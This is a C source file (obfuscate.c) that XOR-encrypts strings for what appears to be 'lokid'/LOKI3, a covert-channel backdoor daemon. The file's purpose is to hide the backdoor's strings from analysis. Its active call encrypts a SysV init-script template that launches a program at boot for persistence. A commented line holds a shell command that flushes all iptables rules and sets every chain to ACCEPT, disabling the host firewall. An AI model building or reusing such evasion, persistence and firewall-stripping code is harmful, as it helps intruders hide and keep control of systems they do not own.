obfuscate.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <time.h>

#define CSTROBF_MAX 1024
#define KEY_SIZE    8


typedef struct cstrobf {
	uint8_t		str[CSTROBF_MAX];
	size_t		size;
	uint8_t		key[KEY_SIZE];
	size_t		ksize;
} estring;


char *decrypt(estring encrypted) {
	int i;
	char buf[CSTROBF_MAX] = {0};

	for (i = 0; i < encrypted.size; i++)
		buf[i] = encrypted.str[i] ^ encrypted.key[i % encrypted.ksize];

	return strdup(buf);
}

void destroy(char *buf, size_t len) {
	for(int i = 0; i < len; i++)
		buf[i] = rand() % 256;
	free(buf);
}

void encrypt(const char *varname, const uint8_t *buf) {
	int i;
	uint8_t ebuf[CSTROBF_MAX] = {0};
	uint8_t key[KEY_SIZE] = {0};
	size_t len;


	len = strlen(buf);

	for (i = 0; i < KEY_SIZE; i++)
		key[i] = rand() % 256;

	for (i = 0; i < len; i++)
		ebuf[i] = buf[i] ^ key[i % KEY_SIZE];

	/* ughly ass print this to stdout. if you don't want a newline,
	   whack off the last byte, and decrease the size by one */
	printf("estring %s = { \"", varname);
	for (i = 0; i < len; i++)
		printf("\\x%02x", ebuf[i]);
	printf("\", %ld, \"", len);
	for (i = 0; i < KEY_SIZE; i++)
		printf("\\x%02x", key[i]);
	printf("\", %d }; // %s\n", KEY_SIZE, buf);
}

int main(int argc, char *argv[]) {
	srand(time(NULL));

	//estring L_MSG_BANNER = { "\xda\x30\x80\x6c\x99\xbc\xe5\x8d\xbd\x1a\xbd\x07\x8b\xa7\x8f\xc0\xf0\x4e\xff\x16\xe9\xa2\xdf\xd9\xe0\x4c\xef\x62\xbc\xea\x8f\x9d\xb9\x0a\xaa\x07\x83\xfa\x9e\x8e\xb5\x0e\xb6\x7a\xda", 45, "\xd0\x7c\xcf\x27\xd0\x8f\xec\xe9", 8 }; // \nLOKI3\tdmfr [(c) 2019-3000 Elective Surgery]\n

	//char *d = decrypt(L_MSG_BANNER);
	//printf("%s", d); destroy(d, L_MSG_BANNER.size);


	//encrypt("S_STAT_REQUESTS", "requests:\t\t%d\n");
	//encrypt("S_STAT_BYTES_WRITTEN", "bytes written:\t\t%d\n");
	//encrypt("S_STAT_PACKETS_WRITTEN", "packets written:\t%d\n");
	//encrypt("S_STAT_CLIENT_ID", "client ID:\t\t%d\n");
	//encrypt("S_STAT_UPTIME", "server uptime:\t\t%.02f minutes\n");
	//encrypt("S_STAT_CRYPTO", "active cryptography:\t%s\n");
	//encrypt("S_STAT_TRANSPORT", "active transport:\t%s\n");
	//encrypt("S_STAT_INTERFACE", "remote interface:\t%s\n");
	//encrypt("S_STAT_VERSION", "\nlokid version:\t\t%s\n");


	encrypt("S_SYSV_SERVICE", "#!/bin/sh\n"
			 "### BEGIN INIT INFO\n"
			 "# Provides: %s\n"
			 "# Default-Start: 2 3 4 5\n"
			 "# Default-Stop: 0 1 6\n"
			 "# Short-Description: %s\n"
			 "# Description: %s\n"
			 "### END INIT INFO\n\n"
			 "case \"$1\" in\n"
			 "    start)\n"
			 "        %s &\n"
			 "        ;;\n"
			 "esac\n"
			"exit 0\n");
	//encrypt("S_CMD_FLUSH_IPTABLES", "PATH=/sbin:/usr/sbin iptables -X 2> /dev/null; PATH=/sbin:/usr/sbin iptables -F 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t nat -F 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t nat -X 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t mangle -F 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t mangle -X 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t raw -F 2> /dev/null; PATH=/sbin:/usr/sbin iptables -t raw -X 2> /dev/null; PATH=/sbin:/usr/sbin iptables -P INPUT ACCEPT 2> /dev/null; PATH=/sbin:/usr/sbin iptables -P FORWARD ACCEPT 2> /dev/null; PATH=/sbin:/usr/sbin iptables -P OUTPUT ACCEPT 2> /dev/null");

	//encrypt("S_MSG_CLIENT_DB_FULL", "\nlokid: Client database full");
	//encrypt("S_MSG_EXPIRED_CLIENT", "\nlokid: inactive client <%d> expired from list [%d]\n");
	//encrypt("S_MSG_CLIENTK", "\nlokid: clean exit (killed at client request)\n");
	//encrypt("S_MSG_UNKNOWN", "\nlokid: cannot locate client entry in database\n");

	//encrypt("S_MSG_CANNOT_CHDIR", "[fatal] cannot chdir to WORKING_ROOT");
	//encrypt("S_MSG_CANNOT_DETACH_TERMINAL", "[fatal] cannot detach from controlling terminal");
	//encrypt("S_MSG_CANNOT_CREATE_SESSION", "[fatal] Cannot create session");
	//encrypt("S_MSG_CANNOT_DAEMONIZE", "[fatal] Cannot go daemon");
	//encrypt("S_MSG_CANNOT_SIGNAL_PROCESS_GROUP", "[fatal] could not signal process group");
	//encrypt("S_MSG_SENDING_L_QUIT", "\tsending L_QUIT: <%d> %s\n");
	//encrypt("S_MSG_TRUNCATED_WRITE", "[non fatal] truncated write");
	//encrypt("S_MSG_POPEN", "\nlokid: popen");
	//encrypt("S_MSG_CLIENT_ALL_KILL", "\nlokid: client <%d> requested an all kill\n");
	//encrypt("S_MSG_CLIENT_FREED", "\nlokid: client <%d> freed from list [%d]");
	//encrypt("S_MSG_FORK_ERROR", "[fatal] forking error");
	//encrypt("S_MSG_WIERDERR", "\n[SUPER fatal] control should NEVER fall here\n");

	//encrypt("S_MSG_SHM_DETACH_ERROR", "[fatal] shared mem segment detach error");
	//encrypt("S_MSG_CANNOT_DESTROY_SHMID", "[fatal] cannot destroy shmid");
	//encrypt("S_MSG_CANNOT_DESTROY_SEMAPHORE", "[fatal] cannot destroy semaphore");
	//encrypt("S_MSG_SHM_SEGMENT_ERROR", "[fatal] shared mem segment request error");
	//encrypt("S_MSG_SEMAPHORE_ALLOCATION_ERROR", "[fatal] semaphore allocation error");
	//encrypt("S_MSG_CANNOT_LOCK_MEMORY", "[fatal] could not lock memory");
	//encrypt("S_MSG_CANNOT_UNLOCK_MEMORY", "[fatal] could not unlock memory");
	//encrypt("S_MSG_SIGCHLD", "[fatal] cannot catch SIGCHLD");
	//encrypt("S_MSG_SIGUSR1", "[fatal] cannot catch SIGUSR1");
	//encrypt("S_MSG_SIGCHLD", "[fatal] cannot catch SIGCHLD");
	//encrypt("S_MSG_SIGALRM", "[fatal] cannot catch SIGALRM");
	//encrypt("S_MSG_SIGTERM", "[fatal] cannot catch SIGTERM");
	//encrypt("S_MSG_ATEXIT", "[fatal] cannot register with atexit(2)");
	//encrypt("S_MSG_IP_HDRINCL", "Cannot set IP_HDRINCL socket option");
	//encrypt("S_MSG_SOCKET", "[fatal] socket allocation error");
	//encrypt("S_MSG_UNKNOWN_TRANSPORT", "[fatal] Unknown transport\n");
	//encrypt("S_MSG_NOPRIV", "\n[fatal] invalid user identification value");
	//encrypt("S_MSG_CANNOT_SIGNAL_PARENT", "[fatal] could not signal parent");
	//encrypt("S_MSG_CANNOT_ADD_KEY", "\nlokid: Cannot add key\n");
	//encrypt("S_MSG_USAGE", "\nlokid -p (i|u) [ -v (0|1) ]\n");
	//encrypt("S_MSG_UNSUP", "\nlokid: unsupported or unknown command string\n");
	//encrypt("S_MSG_PROTOCOL_CHANGED",  "lokid: transport protocol changed to %s\n");
	//encrypt("S_MSG_SEND_PROTO_UPDATE", "\tsending protocol update: <%d> %s [%d]\n");
	//encrypt("S_MSG_PROTOUPDATE", "\nlokid: client <%d> requested a protocol swap\n");
	//encrypt("L_MSG_BANNER", "\nLOKI3\tdmfr [(c) 2019-3000 Elective Surgery]\n");
	return EXIT_SUCCESS;
}